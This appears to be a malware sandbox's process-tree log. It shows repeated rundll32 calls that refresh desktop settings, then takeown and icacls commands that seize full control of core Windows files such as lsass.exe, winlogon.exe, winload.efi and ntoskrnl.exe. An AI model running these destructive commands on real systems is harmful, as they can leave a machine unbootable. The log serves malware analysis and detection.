C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3840
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:4804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2884
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3556
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2344
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3780
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2208
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3352
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:240
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:392
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3172
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3016
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:4724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1020
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2632
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3776
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:4772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3540
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2564
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:252
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1164
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3428
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2760
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3712
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:4816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2000
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:4412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:4300
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:4512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3640
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:4076
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2688
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2056
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:4580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:892
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:4112
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1104
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:4516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3800
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:4388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1552
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:4916
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3940
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2380
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:4800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2908
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:4640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2704
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:4384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1544
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:4380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2196
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3440
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:584
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:4084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:4304
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:5044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2524
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3616
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1092
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:4556
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1416
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:4516
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:4424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3384
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2980
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:4772
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:888
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:4884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:4640
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:4508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:8
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:4912
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1180
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3680
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2132
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1920
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2892
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1708
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:468
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:4220
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:972
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1160
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:440
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:4756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1660
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:4392
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3364
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:896
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3760
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1440
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:948
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:5044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2332
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2316
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3700
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:4616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3796
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1412
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:4256
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3976
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:5088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:336
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:4756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2424
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:4612
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:4228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3644
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1076
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:656
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1444
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:4176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3704
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2012
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\smss.exe && icacls C:\Windows\System32\smss.exe /grant "%username%:F" && exit2⤵PID:4756
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\smss.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3852
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\smss.exe /grant "Admin:F"3⤵PID:3600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\csrss.exe && icacls C:\Windows\System32\csrss.exe /grant "%username%:F" && exit2⤵PID:4372
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\csrss.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2340
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\csrss.exe /grant "Admin:F"3⤵PID:956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\wininit.exe && icacls C:\Windows\System32\wininit.exe /grant "%username%:F" && exit2⤵PID:4784
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\wininit.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:244
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\wininit.exe /grant "Admin:F"3⤵PID:1892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant "%username%:F" && exit2⤵PID:3580
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\LogonUI.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4176
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\LogonUI.exe /grant "Admin:F"3⤵PID:4360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\lsass.exe && icacls C:\Windows\System32\lsass.exe /grant "%username%:F" && exit2⤵PID:4576
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\lsass.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4236
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\lsass.exe /grant "Admin:F"3⤵PID:3284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\services.exe && icacls C:\Windows\System32\services.exe /grant "%username%:F" && exit2⤵PID:436
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\services.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4552
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\services.exe /grant "Admin:F"3⤵PID:3308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winlogon.exe && icacls C:\Windows\System32\winlogon.exe /grant "%username%:F" && exit2⤵PID:3624
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\winlogon.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2444
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\winlogon.exe /grant "Admin:F"3⤵PID:1292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.efi && icacls C:\Windows\System32\winload.efi /grant "%username%:F" && exit2⤵PID:424
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\winload.efi3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2664
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\winload.efi /grant "Admin:F"3⤵PID:4236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.exe && icacls C:\Windows\System32\winload.exe /grant "%username%:F" && exit2⤵PID:1932
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\winload.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2392
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\winload.exe /grant "Admin:F"3⤵PID:2728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\ntoskrnl.exe && icacls C:\Windows\System32\ntoskrnl.exe /grant "%username%:F" && exit2⤵PID:5096
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\ntoskrnl.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3164
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\ntoskrnl.exe /grant "Admin:F"3⤵PID:4952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\svchost.exe && icacls C:\Windows\System32\svchost.exe /grant "%username%:F" && exit2⤵PID:4204
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\svchost.exe3⤵
- Suspicious use of AdjustPrivilegeToken
